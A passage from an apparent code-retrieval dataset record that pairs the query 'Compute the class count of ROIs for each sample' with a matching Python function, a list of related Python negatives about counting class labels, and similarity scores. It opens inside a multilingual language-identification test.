\"Su padre luchó al lado de Luis Moya, primer Jefe\", \"label\": \"es\"},\n {\"text\": \"informazione.\", \"label\": \"it\"},\n {\"text\": \"Primacom bietet für Telekom-Kabelnetz\", \"label\": \"de\"},\n {\"text\": \"Oświadczenie prezydencji w imieniu Unii\", \"label\": \"pl\"},\n {\"text\": \"foran rattet i familiens gamle Baleno hvis døra på\", \"label\": \"no\"},\n {\"text\": \"[speaker:laughter]\", \"label\": \"sl\"},\n {\"text\": \"Dog med langt mindre utstyr med seg.\", \"label\": \"nn\"},\n {\"text\": \"dass es nicht schon mit der anfänglichen\", \"label\": \"de\"},\n {\"text\": \"इस पर दोनों पक्षों में नोकझोंक शुरू हो गई ।\", \"label\": \"hi\"},\n {\"text\": \"کے ترجمان منیش تیواری اور دگ وجئے سنگھ نے بھی یہ\", \"label\": \"ur\"},\n {\"text\": \"dell'Assemblea Costituente che posseggono i\", \"label\": \"it\"},\n {\"text\": \"и аште вьси съблазнѧтъ сѧ нъ не азъ\", \"label\": \"cu\"},\n {\"text\": \"In Irvine hat auch das Logistikunternehmen Atlas\", \"label\": \"de\"},\n {\"text\": \"законодательных норм, принимаемых существующей\", \"label\": \"ru\"},\n {\"text\": \"Κροίσῳ προτείνων τὰς χεῖρας ἐπικατασφάξαι μιν\", \"label\": \"grc\"},\n {\"text\": \"МИНУСЫ: ИНФЛЯЦИЯ И КРИЗИС В ЖИВОТНОВОДСТВЕ.\", \"label\": \"ru\"},\n {\"text\": \"unterschiedlicher Meinung .\", \"label\": \"de\"},\n {\"text\": \"Jospa joku ystävällinen sielu auttaisi kassieni\", \"label\": \"fi\"},\n {\"text\": \"Añadió que, en el futuro se harán otros\", \"label\": \"es\"},\n {\"text\": \"Sessiz tonlama hem Fince, hem de Kuzey Sami\", \"label\": \"tr\"},\n {\"text\": \"nicht ihnen gehört und sie nicht alles , was sie\", \"label\": \"de\"},\n {\"text\": \"Etelästä Kuivajärveen laskee Tammelan Liesjärvestä\", \"label\": \"fi\"},\n {\"text\": \"ICANNs Vorsitzender Vint Cerf warb mit dem Hinweis\", \"label\": \"de\"},\n {\"text\": \"Norsk politikk frå til kan dermed, i\", \"label\": \"nn\"},\n {\"text\": \"Głosowało posłów.\", \"label\": \"pl\"},\n {\"text\": \"Danny Jones -- smithjones@ev.net\", \"label\": \"en\"},\n {\"text\": \"sebeuvědomění moderní civilizace sehrála lučavka\", \"label\": \"cs\"},\n {\"text\": \"относительно спокойный сон: тому гарантия\", \"label\": \"ru\"},\n {\"text\": \"A halte voiz prist li pedra a crïer\", \"label\": \"fro\"},\n {\"text\": \"آن‌ها امیدوارند این واکسن به‌زودی در دسترس بیماران\", \"label\": \"fa\"},\n {\"text\": \"vlastní důstojnou vousatou tváří.\", \"label\": \"cs\"},\n {\"text\": \"ora aprire la strada a nuove cause e alimentare il\", \"label\": \"it\"},\n {\"text\": \"Die Zahl der Vielleser nahm von auf Prozent zu ,\", \"label\": \"de\"},\n {\"text\": \"Finanzvorstand von Hotline-Dienstleister InfoGenie\", \"label\": \"de\"},\n {\"text\": \"entwickeln .\", \"label\": \"de\"},\n {\"text\": \"incolumità pubblica.\", \"label\": \"it\"},\n {\"text\": \"lehtija televisiomainonta\", \"label\": \"fi\"},\n {\"text\": \"joistakin kohdista eri mieltä.\", \"label\": \"fi\"},\n {\"text\": \"Hlavně anglická nezávislá scéna, Dead Can Dance,\", \"label\": \"cs\"},\n {\"text\": \"pásmech od do bodů bodové stupnice.\", \"label\": \"cs\"},\n {\"text\": \"Zu Beginn des Ersten Weltkrieges zählte das\", \"label\": \"de\"},\n {\"text\": \"Així van sorgir, damunt els antics cementiris,\", \"label\": \"ca\"},\n {\"text\": \"In manchem Gedicht der spätern Alten, wie zum\", \"label\": \"de\"},\n {\"text\": \"gaweihaida jah insandida in þana fairƕu jus qiþiþ\", \"label\": \"got\"},\n {\"text\": \"Beides sollte gelöscht werden!\", \"label\": \"de\"},\n {\"text\": \"modifiqués la seva petició inicial de anys de\", \"label\": \"ca\"},\n {\"text\": \"В день открытия симпозиума состоялась закладка\", \"label\": \"ru\"},\n {\"text\": \"tõestatud.\", \"label\": \"et\"},\n {\"text\": \"ἵππῳ πίπτει αὐτοῦ ταύτῃ\", \"label\": \"grc\"},\n {\"text\": \"bisher nie enttäuscht!\", \"label\": \"de\"},\n {\"text\": \"De bohte ollu tuollárat ja suttolaččat ja\", \"label\": \"sme\"},\n {\"text\": \"Klarsignal från röstlängdsläsaren, tre tryck i\", \"label\": \"sv\"},\n {\"text\": \"Tvůrcem nového termínu je Joseph Fisher.\", \"label\": \"cs\"},\n {\"text\": \"Nie miałem czasu na reakcję twierdzi Norbert,\", \"label\": \"pl\"},\n {\"text\": \"potentia Schöpfer.\", \"label\": \"de\"},\n {\"text\": \"Un poquito caro, pero vale mucho la pena;\", \"label\": \"es\"},\n {\"text\": \"οὔ τε γὰρ ἴφθιμοι Λύκιοι Δαναῶν ἐδύναντο τεῖχος\", \"label\": \"grc\"},\n {\"text\": \"vajec, sladového výtažku a některých vitamínových\", \"label\": \"cs\"},\n {\"text\": \"Настоящие герои, те, чьи истории потом\", \"label\": \"ru\"},\n {\"text\": \"praesumptio:\", \"label\": \"la\"},\n {\"text\": \"Olin justkui nende vastutusel.\", \"label\": \"et\"},\n {\"text\": \"Jokainen keinahdus tuo lähemmäksi hetkeä jolloin\", \"label\": \"fi\"},\n {\"text\": \"ekonomicky výhodných způsobů odvodnění těžkých,\", \"label\": \"cs\"},\n {\"text\": \"Poprvé ve své historii dokázala v kvalifikaci pro\", \"label\": \"cs\"},\n {\"text\": \"zpracovatelského a spotřebního průmyslu bude nutné\", \"label\": \"cs\"},\n {\"text\": \"Windows CE zu integrieren .\", \"label\": \"de\"},\n {\"text\": \"Armangué, a través d'un decret, ordenés l'aturada\", \"label\": \"ca\"},\n {\"text\": \"to, co nás Evropany spojuje, než to, co nás od\", \"label\": \"cs\"},\n {\"text\": \"ergänzt durch einen gesetzlich verankertes\", \"label\": \"de\"},\n {\"text\": \"Насчитал, что с начала года всего три дня были\", \"label\": \"ru\"},\n {\"text\": \"Borisovu tražeći od njega da prihvati njenu\", \"label\": \"sr\"},\n {\"text\": \"la presenza di ben veleni diversi: . chili di\", \"label\": \"it\"},\n {\"text\": \"καὶ τῶν ἐκλεκτῶν ἀγγέλων ἵνα ταῦτα φυλάξῃς χωρὶς\", \"label\": \"grc\"},\n {\"text\": \"pretraživale obližnju bolnicu i stambene zgrade u\", \"label\": \"hr\"},\n {\"text\": \"An rund Katzen habe Wolf seine Spiele getestet ,\", \"label\": \"de\"},\n {\"text\": \"investigating since March.\", \"label\": \"en\"},\n {\"text\": \"Tonböden (Mullböden).\", \"label\": \"de\"},\n {\"text\": \"Stálý dopisovatel LN v SRN Bedřich Utitz\", \"label\": \"cs\"},\n {\"text\": \"červnu předložené smlouvy.\", \"label\": \"cs\"},\n {\"text\": \"πνεύματι ᾧ ἐλάλει\", \"label\": \"grc\"},\n {\"text\": \".%의 신장세를 보였다.\", \"label\": \"ko\"},\n {\"text\": \"Foae verde, foi de nuc, Prin pădure, prin colnic,\", \"label\": \"ro\"},\n {\"text\": \"διαπέμψας ἄλλους ἄλλῃ τοὺς μὲν ἐς Δελφοὺς ἰέναι\", \"label\": \"grc\"},\n {\"text\": \"المسلمين أو أي تيار سياسي طالما عمل ذلك التيار في\", \"label\": \"ar\"},\n {\"text\": \"As informações são da Dow Jones.\", \"label\": \"pt\"},\n {\"text\": \"Milliarde DM ausgestattet sein .\", \"label\": \"de\"},\n {\"text\": \"De utgår fortfarande från att kvinnans jämlikhet\", \"label\": \"sv\"},\n {\"text\": \"Sneeuw maakte in Davos bij de voorbereiding een\", \"label\": \"nl\"},\n {\"text\": \"De ahí que en este mercado puedan negociarse\", \"label\": \"es\"},\n {\"text\": \"intenzívnějšímu sbírání a studiu.\", \"label\": \"cs\"},\n {\"text\": \"और औसकर ४.० पैकेज का प्रयोग किया गया है ।\", \"label\": \"hi\"},\n {\"text\": \"Adipati Kuningan karena Kuningan menjadi bagian\", \"label\": \"id\"},\n {\"text\": \"Svako je bar jednom poželeo da mašine prosto umeju\", \"label\": \"sr\"},\n {\"text\": \"Im vergangenen Jahr haben die Regierungen einen\", \"label\": \"de\"},\n {\"text\": \"durat motus, aliquid fit et non est;\", \"label\": \"la\"},\n {\"text\": \"Dominować będą piosenki do tekstów Edwarda\", \"label\": \"pl\"},\n {\"text\": \"beantwortet .\", \"label\": \"de\"},\n {\"text\": \"О гуманитариях было кому рассказывать, а вот за\", \"label\": \"ru\"},\n {\"text\": \"Helsingin kaupunki riitautti vuokrasopimuksen\", \"label\": \"fi\"},\n {\"text\": \"chợt tan biến.\", \"label\": \"vi\"},\n {\"text\": \"avtomobil ločuje od drugih.\", \"label\": \"sl\"},\n {\"text\": \"Congress has proven itself ineffective as a body.\", \"label\": \"en\"},\n {\"text\": \"मैक्सिको ने इस तरह का शो इस समय आयोजित करने का\", \"label\": \"hi\"},\n {\"text\": \"No minimum order amount.\", \"label\": \"en\"},\n {\"text\": \"Convertassa .\", \"label\": \"fi\"},\n {\"text\": \"Как это можно сделать?\", \"label\": \"ru\"},\n {\"text\": \"tha mi creidsinn gu robh iad ceart cho saor shuas\", \"label\": \"gd\"},\n {\"text\": \"실제 일제는 이런 만해의 논리를 묵살하고 한반도를 침략한 다음 , 이어 만주를 침략하고\", \"label\": \"ko\"},\n {\"text\": \"Da un semplice richiamo all'ordine fino a grandi\", \"label\": \"it\"},\n {\"text\": \"pozoruhodný nejen po umělecké stránce, jež\", \"label\": \"cs\"},\n {\"text\": \"La comida y el servicio aprueban.\", \"label\": \"es\"},\n {\"text\": \"again, connected not with each other but to the\", \"label\": \"en\"},\n {\"text\": \"Protokol výslovně stanoví, že nikdo nemůže být\", \"label\": \"cs\"},\n {\"text\": \"ఒక విషయం అడగాలని ఉంది .\", \"label\": \"te\"},\n {\"text\": \"Безгранично почитая дирекцию, ловя на лету каждое\", \"label\": \"ru\"},\n {\"text\": \"rovnoběžných růstových vrstev, zůstávají krychlové\", \"label\": \"cs\"},\n {\"text\": \"प्रवेश और पूर्व प्रधानमंत्री लाल बहादुर शास्त्री\", \"label\": \"hi\"},\n {\"text\": \"Bronzen medaille in de Europese marathon.\", \"label\": \"nl\"},\n {\"text\": \"- gadu vecumā viņi to nesaprot.\", \"label\": \"lv\"},\n {\"text\": \"Realizó sus estudios primarios en la Escuela Julia\", \"label\": \"es\"},\n {\"text\": \"cuartos de final, su clasificación para la final a\", \"label\": \"es\"},\n {\"text\": \"Sem si pro něho přiletí americký raketoplán, na\", \"label\": \"cs\"},\n {\"text\": \"Way to go!\", \"label\": \"en\"},\n {\"text\": \"gehört der neuen SPD-Führung unter Parteichef\", \"label\": \"de\"},\n {\"text\": \"Somit simuliert der Player mit einer GByte-Platte\", \"label\": \"de\"},\n {\"text\": \"Berufung auf kommissionsnahe Kreise , die bereits\", \"label\": \"de\"},\n {\"text\": \"Dist Clarïen\", \"label\": \"fro\"},\n {\"text\": \"Schon nach den Gerüchten , die Telekom wolle den\", \"label\": \"de\"},\n {\"text\": \"Software von NetObjects ist nach Angaben des\", \"label\": \"de\"},\n {\"text\": \"si enim per legem iustitia ergo Christus gratis\", \"label\": \"la\"},\n {\"text\": \"ducerent in ipsam magis quam in corpus christi,\", \"label\": \"la\"},\n {\"text\": \"Neustar-Melbourne-IT-Partnerschaft NeuLevel .\", \"label\": \"de\"},\n {\"text\": \"forderte dagegen seine drastische Verschärfung.\", \"label\": \"de\"},\n {\"text\": \"pemmican på hundrede forskellige måder.\", \"label\": \"da\"},\n {\"text\": \"Lehån, själv matematiklärare, visar hur den nya\", \"label\": \"sv\"},\n {\"text\": \"I highly recommend his shop.\", \"label\": \"en\"},\n {\"text\": \"verità, giovani fedeli prostratevi #amen\", \"label\": \"it\"},\n {\"text\": \"उत्तर प्रदेश के अध्यक्ष पद से हटाए गए विनय कटियार\", \"label\": \"hi\"},\n {\"text\": \"() روزی مےں کشادگی ہوتی ہے۔\", \"label\": \"ur\"},\n {\"text\": \"Prozessorgeschäft profitieren kann , stellen\", \"label\": \"de\"},\n {\"text\": \"školy začalo počítat pytle s moukou a zjistilo, že\", \"label\": \"cs\"},\n {\"text\": \"प्रभावशाली पर गैर सरकारी लोगों के घरों में भी\", \"label\": \"hi\"},\n {\"text\": \"geschichtslos , oder eine Farce , wie sich\", \"label\": \"de\"},\n {\"text\": \"Ústrednými mocnosťami v marci však spôsobilo, že\", \"label\": \"sk\"},\n {\"text\": \"التسليح بدون مبرر، واستمرار الأضرار الناجمة عن فرض\", \"label\": \"ar\"},\n {\"text\": \"Například Pedagogická fakulta Univerzity Karlovy\", \"label\": \"cs\"},\n {\"text\": \"nostris ut eriperet nos de praesenti saeculo\", \"label\": \"la\"}]\n \n docs = [Document([], text=example[\"text\"]) for example in examples]\n gold_labels = [example[\"label\"] for example in examples]\n basic_multilingual(docs)\n accuracy = sum([(doc.lang == label) for doc,label in zip(docs,gold_labels)])/len(docs)\n assert accuracy >= 0.98", "def rl_s(rl):\r\n c.execute(\"SELECT * FROM personnel WHERE role=:role COLLATE NOCASE\", {'role': rl})\r\n return c.fetchall()", "def normalize(w):\n\n nfkd = unicodedata.normalize('NFKD', w)\n return ''.join(x for x in nfkd if unicodedata.category(x)[0] == 'L').lower()" ]
[ "0.6623606", "0.65305656", "0.65305656", "0.64108706", "0.64108706", "0.63947916", "0.63842875", "0.6326007", "0.6215365", "0.6073148", "0.60546684", "0.58473516", "0.583685", "0.55808395", "0.5559438", "0.53668314", "0.5345691", "0.5240828", "0.52396196", "0.523723", "0.5231429", "0.5169655", "0.51657677", "0.51557344", "0.5080345", "0.5068122", "0.50593", "0.505509", "0.50448436", "0.5031999", "0.5014203", "0.497184", "0.4970613", "0.49705786", "0.49705786", "0.49014503", "0.48825485", "0.48825485", "0.48741487", "0.4865283", "0.48451665", "0.48420146", "0.48374146", "0.48239025", "0.4823787", "0.48221442", "0.48177055", "0.48001385", "0.47959554", "0.47866267", "0.4774249", "0.47708055", "0.47540864", "0.4748772", "0.4744818", "0.47263968", "0.4722051", "0.4709131", "0.47076643", "0.47066227", "0.46963865", "0.46928656", "0.46916798", "0.468339", "0.46831048", "0.46731696", "0.4671535", "0.46591413", "0.46555427", "0.4651946", "0.46462137", "0.46435046", "0.46376988", "0.4634208", "0.46290013", "0.46260944", "0.46254772", "0.46125275", "0.46105796", "0.46090353", "0.46052533", "0.45993504", "0.45835778", "0.45788965", "0.4564968", "0.45618254", "0.45592207", "0.45581025", "0.4557343", "0.455589", "0.4552599", "0.45522055", "0.45503455", "0.45428804", "0.45416284", "0.4541069", "0.4540956", "0.45277953", "0.45216256", "0.4521464", "0.45199272" ]
0.0
-1
Compute the class count of ROIs for each sample.
def count_classes(self, index=None): if index is None: index = np.arange(self.Samples.shape[0]) elif isinstance(index, int): index = [index] count = np.zeros((len(index), len(self._classes)), dtype=np.int) for _ind in range(len(index)): rois = self.__getrois__(index[_ind]) count[_ind, :] = np.bincount(rois[:,4].astype(np.int), minlength=len(self._classes)) return count
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_num_classes(self):", "def resultCounter(detections):\n counter = 0\n for attribute, value in classIterator(detections):\n if 'crease' in attribute:\n counter += len(value)\n return counter", "def class_counts(rows):\n counts = {} # a dictionary of label -> count.\n for row in rows:\n # in our dataset format, the label is always the last column\n label = row[-1]\n if label not in counts:\n counts[label] = 0\n counts[label] += 1\n return counts", "def class_counts(rows):\n counts = {} # a dictionary of label -> count.\n for row in rows:\n # in our dataset format, the label is always the last column\n label = row[-1]\n if label not in counts:\n counts[label] = 0\n counts[label] += 1\n return counts", "def class_counts(rows):\n counts = {} # a dictionary of label -> count.\n for row in rows:\n # in our dataset format, the label is always the last column\n label = row[-1]\n if label not in counts:\n counts[label] = 0\n counts[label] += 1\n return counts", "def count_classes(labels):\n class_dict = {}\n for image in labels:\n for row in image:\n for label in row:\n if label not in class_dict:\n class_dict[label] = 1\n else:\n class_dict[label] += 1\n return class_dict", "def get_roi_counts(self):\n counts = [[roi.counts for roi in group.rois] for group in self.roi_groups]\n return counts", "def get_class_count(df):\r\n \r\n return df[\"class\"].value_counts()", "def computeNumClass(self):\n # Get the number of data\n n = len(self.data)\n # For IQR\n # First, compute the position of the first and third quartile\n fQPos = ( (n - 1) / 4 ) + 1\n tQPos = ( (3 * (n - 1)) / 4 ) + 1\n # Get the quartiles\n firstQ = 0.0\n thirdQ = 0.0\n if fQPos == round(fQPos):\n firstQ = self.data[int(fQPos)]\n else:\n up = round(fQPos)\n firstQ = self.data[up - 1] + ((self.data[up] - self.data[up - 1]) / 4.0)\n if tQPos == round(tQPos):\n thirdQ = self.data[int(tQPos)]\n else:\n up = round(tQPos)\n thirdQ = self.data[up - 1] + (3 * (self.data[up] - self.data[up - 1]) / 4.0)\n # Compute the IQR\n IQR = thirdQ - firstQ\n # Compute the number of classes and its length\n self.numBins = int(2 * IQR * m.pow(n, -1/3))\n self.computeBinWidth()", "def num_classes():\n return NUM_CLASSES", "def summarize_classes(classes):\n u, indices = np.unique(classes,return_inverse=True)\n num_u=len(u)\n print(\"****************************\")\n print(\"Number of samples: {0}\".format(len(classes)))\n print(\"Number of Classes:{0}\".format(num_u))\n for c in u:\n num_c=np.sum(classes==c)\n print(\"Class {0}: {1} Samples\".format(c,num_c))\n print(\"****************************\")", "def gen_img_counts(img_path, model):\n\n img = transform(Image.open(img_path).convert('RGB'))\n print(type(img))\n output = model(img.unsqueeze(0))\n pred_count = int(output.detach().cpu().sum().numpy())\n return pred_count", "def classes_calculations(input):\n counts, _ = np.histogram(input, bins=int(\n input.max() + 1), range=(0, int(input.max())))\n return np.nonzero(counts)[0]", "def class_distribution(y): \n # ===================== PLEASE WRITE HERE =====================\n \n bin_array = np.bincount(y)\n n_class1 = bin_array[1]\n n_class2 = bin_array[2]\n n_class3 = bin_array[3]\n \n # ===================== PLEASE WRITE HERE =====================\n \n print('Number of samples in class_1:', n_class1)\n print('Number of samples in class_2:', n_class2)\n print('Number of samples in class_3:', n_class3)", "def classesAndFrames(self):\n classes = defaultdict(int)\n with open(self.inputfile) as fin:\n for line in fin:\n arr = line.strip().split()\n y = int(arr[1])\n classes[y] += 1\n return classes", "def num_classes(self):\n raise NotImplementedError", "def get_num_classes(df):\n classes = df.groupby('class_label')\n return classes.ngroups", "def test_class_counts(self):\n oz = ClassificationScoreVisualizer(GaussianNB())\n oz.fit(self.multiclass.X.train, self.multiclass.y.train)\n\n unique, counts = np.unique(self.multiclass.y.train, return_counts=True)\n npt.assert_array_equal(oz.classes_, unique)\n npt.assert_array_equal(oz.class_counts_, counts)", "def num_classes(self) -> int:\n y = self.data.y\n if y is None:\n return 0\n elif y.numel() == y.size(0) and not torch.is_floating_point(y):\n return int(self.data.y.max()) + 1\n elif y.numel() == y.size(0) and torch.is_floating_point(y):\n return torch.unique(y).numel()\n else:\n return self.data.y.size(-1)", "def __uniqueCounts(rows):\n results = {} #Initialize a dictionary to store the results\n for row in rows: #Iterate over all rows of data\n #The result is the last column\n r = row[-1]\n if r not in results: results[r] = 0 #Start the count for each class at zero\n results[r] += 1 #Increment the count for this row's class by 1\n return results", "def _classify(self, sample):\n # This function is used so that we can reduce each row with respect \n # to the sample.\n def calc_dist(vector):\n return distance_utils.euclidean(vector, sample)\n\n distances = self.training_set.reduce_rows(calc_dist)\n \n votes = self._tally_votes(self.training_set.get_labels(), distances)\n \n return collection_utils.get_key_with_highest_value(votes)", "def sample_count(self):", "def cluster_obs_count(self):\n return(self.merged_data.groupby(\n 'labels').count().transpose().iloc[0, :])", "def num_of_classes(self):\n return len(self.classes_())", "def num_of_classes(self):\n return len(self.classes_())", "def get_num_cat(sample_by_cat, samples_in_otus):\r\n num_cat = defaultdict(int)\r\n for cat, samples in sample_by_cat.items():\r\n num_samples = len(set(samples_in_otus) & set(samples))\r\n num_cat[cat[0]] += (num_samples * (num_samples - 1)) / 2\r\n return num_cat", "def num_classes(self):\n\t\treturn 10", "def count_target_class_data(data, target_class):\n count = 0\n for row in data:\n if row[0] == target_class:\n count += 1\n\n return count", "def get_class_count(Y_category):\n # Assertions\n assert isinstance(Y_category, np.ndarray), \\\n 'Input must be a numpy ndarray.'\n cls, counts = np.unique(Y_category, return_counts = True)\n cls_counts = dict(zip(cls, counts))\n\n return cls_counts", "def count(self, cls=None):\n return len(self.all(cls))", "def get_gini(self, rows):\n label_count = defaultdict(int)\n total_count = 0\n for row in rows:\n label = row[self.target_attribute]\n label_count[label] += 1\n total_count += 1\n return 1 - sum([np.square(float(label_count[label])/total_count) for label in label_count.keys()])", "def num_classes(self):\n\t\treturn len(self.classes)", "def n_classes(self):\n raise NotImplementedError", "def n_classes(self):\n raise NotImplementedError", "def num_classes(self):\n return len(self.classes)", "def countObjects(self, classType):\n count = 0\n for dobj in self.doId2do.values():\n if isinstance(dobj, classType):\n count += 1\n return count", "def get_num_classes(dataset: str):\n if dataset == \"imagenet\" or dataset == \"kitti\":\n return 1000\n elif dataset == \"cifar10\" or dataset == \"mnist\" or dataset == \"fashion_mnist\":\n return 10", "def getClassCounts(b):\n c = {k:0 for k in labels.keys()}\n for r in b:\n c[r[0]] += 1\n return c", "def num_classes(self):\n\t\t\treturn len(self.classes)", "def numberOfClasses(self):\n classes = self.classesAndFrames()\n return len(classes.keys())", "def class_size(self):\n\t\tif self.subject.count()==0:\n\t\t\treturn student.objects.all().filter(reg=self).count()\n\t\telse:\n\t\t\treturn self.grade_set.all().distinct().count()", "def countclass(self, comb_res, origin_df):\r\n clsdic_ratio = {}\r\n self.clsdic_df = {}\r\n # totalcount = df['count'].sum() # no sum of count but the num of id which attr contains cls\r\n clslist = comb_res['组合需求'].apply(lambda x: x.split('.')[1]).unique().tolist()\r\n\r\n totalcount = len(origin_df[origin_df.attr.apply(self.judge, args=(clslist, ))])\r\n for cls in clslist:\r\n # dfcls = comb_res[comb_res['组合需求'].str.contains(cls)] # no count but distinct id\r\n df_cls = origin_df[origin_df.attr.apply(self.judge, args=(clslist, cls,))]\r\n self.clsdic_df[cls] = df_cls\r\n clsdic_ratio[cls] = round(len(df_cls) / totalcount * 100, 2)\r\n return sorted(clsdic_ratio.items(), key=lambda x: (x[1], x[0]), reverse=True)", "def num_classes(self):\n return self._num_classes", "def classify(self, features):\n\n # TODO: finish this.\n class_labels = []\n # TODO: finish this.\n features = np.array(features)\n feat_shape = features.shape\n for i in range(feat_shape[0]):\n vote = np.zeros((self.num_trees))\n for j in range(self.num_trees):\n #print self.trees[j].classify(feat)\n vote[j] = self.trees[j].classify(features[i,self.attr_track[j]].reshape(1,-1))[0]\n counts = np.bincount(vote.astype(int))\n class_labels.append(np.argmax(counts))\n return class_labels", "def count_class(srcfile, listfile):\n cls_list = []\n\n # open the list file\n with open(listfile, 'r') as f:\n lines = f.readlines()\n\n # check each file in the list\n for line in lines:\n xml_file = srcfile.format(line.strip())\n\n tree = ET.parse(xml_file)\n\n # objs is all the objects in the xml\n objs = tree.findall('object')\n\n # find the class name in the object, and add it to the cls list\n for ix, obj in enumerate(objs):\n cls = str(obj.find('name').text)\n cls_list.append(cls)\n\n # find the keys and sort, count the number of boxes of the keys\n if len(cls_list) > 0:\n cls_list.sort()\n import numpy as np\n cls_arr = np.array(cls_list)\n cls1 = list(set(cls_list))\n print('unsort classes is:', cls1)\n cls1.sort()\n print('sorted classes is:', cls1)\n classes = np.unique(cls_arr)\n print('the class number is:', classes.shape[0])\n print('----------------------------')\n print('the number of each class:')\n for i in range(0, classes.shape[0]):\n # print(classes[i], cls_list.count(classes[i]))\n print(classes[i], ':', np.where(cls_arr==classes[i])[0].shape[0])\n print('----------------------------')\n\n print('the number of all the boxes is:', len(cls_list))\n return cls_list", "def estimate_class(self, observation: np.ndarray) -> int:\n neighbor_classes, distances = self.get_neighbor_classes(observation)\n weights = 1 / np.square(distances)\n classes = np.unique(neighbor_classes)\n class_weight = [sum(weights[neighbor_classes == neighbor_class]) for neighbor_class in classes]\n return classes[np.argmax(class_weight)]", "def trainCount(\n trainData, \n questionType,\n questionDict,\n questionIdict, \n objDict, \n objIdict,\n numAns):\n count_wa = np.zeros((len(objIdict), numAns))\n count_a = np.zeros((numAns))\n objIds = extractObjId(\n trainData[0], \n questionType, \n questionDict, \n questionIdict)\n for i in range(objIds.shape[0]):\n objId = objIds[i]\n obj = questionIdict[objId - 1]\n ansId = trainData[1][i, 0]\n objId2 = objDict[obj]\n count_wa[objId2, ansId] += 1\n count_a[ansId] += 1\n # Add UNK count\n count_a[-1] += 1\n return count_wa, count_a", "def get_class_counts(files):\n return pd.Series(['_'.join([file.split('_')[0], file.split('_')[1]]) for file in files]).value_counts()", "def calc_class_weights(self):\n y = self.train_eval_data[\"sentiment\"]\n self.class_weights = {}\n classes = np.unique(y)\n for cls in classes:\n self.class_weights[cls] = len(y) / (len(classes) * (y == cls).sum())", "def _success_count(cls, samples: Samples) -> int:\n return cls.__sample_count(samples, \"true\")", "def get_num_of_images(self):", "def class_callcount(self):\r\n # timing is stored by node, we compute timing by class on demand\r\n rval = {}\r\n for node, count in self.apply_callcount.items():\r\n typ = type(node.op)\r\n rval.setdefault(typ, 0)\r\n rval[typ] += count\r\n return rval", "def get_number_of_classes(self):\n return len(self.class_dict.keys())", "def n_classes(self):\n raise NotImplementedError()", "def check_correctness_statistics(classifier_out, mode, image_type):\n labels = image_type.image_data[mode].labels\n num_correct = 0\n total = len(classifier_out)\n for index, label in classifier_out:\n if labels[index] == label:\n num_correct += 1\n return (num_correct / total) * 100", "def calcNumberOfMajorityClassRows(self, data, structure):\n maxCount, classIndex = 0, structure['class']['index']\n for value in structure['class']['values']:\n newData = list(filter(lambda y: y[classIndex] == value, data))\n if len(newData) >= maxCount:\n maxCount = len(newData)\n return maxCount", "def _get_observation_count(self):\n observation_count = 0\n for sequence in self.seq_list:\n observation_count += sequence.shape[0] \n \n return observation_count", "def get_label_counts(dataset_path: str):\n if not dataset_path:\n return None\n td = ImageFolder(root=dataset_path)\n # get label distribution\n label_counts = [0] * len(td.classes)\n for p, l in td.samples:\n label_counts[l] += 1\n return label_counts", "def classify(self, instance):\n numerator = 0\n denominator = 0\n for training_instance in self.training_data:\n h_value = self._h_function(instance, training_instance[0])\n numerator = numerator + h_value*training_instance[1]\n denominator = denominator + h_value\n return numerator/denominator", "def classProbs(observation, tree, classes):\n res = classify(observation, tree) #res = results\n total = sum(res.values())\n probs = []\n for c in classes:\n if c in res.keys():\n probs.append(float(res[c])/total)\n else:\n probs.append(0)\n return probs", "def class_callcount(self):\n # timing is stored by node, we compute timing by class on demand\n rval = {}\n for (fgraph, node), count in self.apply_callcount.items():\n typ = type(node.op)\n rval.setdefault(typ, 0)\n rval[typ] += count\n return rval", "def num_classes_a(self):\r\n return self._num_classes_a", "def class_num(self) -> int:\n return int(np.argmax(self.class_scores))", "def count_ner_labels(self, y_true, y_pred):\n return Counter(y_true), Counter(y_pred)", "def _number_of_samples(self):\n return len(self._raw_data.samples)", "def compute_class_freqs(gen):\r\n labels = gen.labels\r\n N = labels.shape[0]\r\n positive_frequencies = np.sum(labels, axis=0) / N\r\n negative_frequencies = np.sum(1 - labels, axis=0) / N\r\n return positive_frequencies, negative_frequencies", "def get_num_classes(self):\n return len(self.class_map_dict)", "def _class_count_2(X, n_classes, worker_weight=None):\n prob = np.zeros((X.shape[1], n_classes))\n if worker_weight is None:\n for i in range(X.shape[0]):\n for j in range(X.shape[1]):\n prob[j, X[i, j]] += 1\n else:\n for i in range(X.shape[0]):\n for j in range(X.shape[1]):\n prob[j, X[i, j]] += worker_weight[i]\n return prob", "def view_counts():\n out = {}\n for i in range(len(classes)):\n out.update({decoded[i]: storage.count(classes[i])})\n return out", "def computeNucStats(trues, preds):\n\t#TP, TN, FP, FN\n\tcount = zeros(4)\n\tfor a in range(len(trues)):\n\t\tif (trues[a] == 'F') & (preds[a] == 'F'):\n\t\t\tcount[0] += 1\n\t\telif (trues[a] == 'N') & (preds[a] == 'N'):\n\t\t\tcount[1] += 1\n\t\telif (trues[a] == 'N') & (preds[a] == 'F'):\n\t\t\tcount[2] += 1\n\t\telif (trues[a] == 'F') & (preds[a] == 'N'):\n\t\t\tcount[3] += 1\n\treturn count", "def number_of_constituents(bc_class):\n num_trn = 0\n cn = bc_class.constituent_properties\n if cn.salinity:\n num_trn += 1\n if cn.temperature:\n num_trn += 1\n if cn.vorticity:\n num_trn += 1\n if not cn.general_constituents.empty:\n num_trn += len(cn.general_constituents.index)\n if not cn.sand.empty:\n num_trn += len(cn.sand.index)\n if not cn.clay.empty:\n num_trn += len(cn.clay.index)\n return num_trn", "def getClassCounts(column, uniqueVal, decision, yes, no , total):\r\n dataDict = {} # a dictionary of labels\r\n for val in uniqueVal:\r\n label1 = val + '/Y'\r\n label2 = val + '/N'\r\n dataDict[label1] = 0; dataDict[label2] = 0\r\n for dec, at in zip(decision, column):\r\n if at == val and dec == 'No':\r\n dataDict[label2] += 1\r\n if at == val and dec == 'Yes':\r\n dataDict[label1] += 1\r\n dataDict[val] = (dataDict[label2]+ dataDict[label1])/ total\r\n dataDict[label2] = dataDict[label2] / no\r\n dataDict[label1] = dataDict[label1] / yes\r\n return dataDict", "def count(self):\n\n raise NotImplementedError", "def num_training_examples(self):", "def get_class_stats(self, curr_class, class_superpixels, kernel_size=3):\n\n # Create a label for each component in the image\n num_obj, output, bbox, centroids = \\\n cv2.connectedComponentsWithStats(class_superpixels.astype(np.uint8), connectivity=8) #added dtype uint8\n\n # Only keep blobs that are above a certain area threshold. Zero out all\n # blobs that are below this threshold. bbox[i,-1] returns the area of the bounding box\n good_idx = [i for 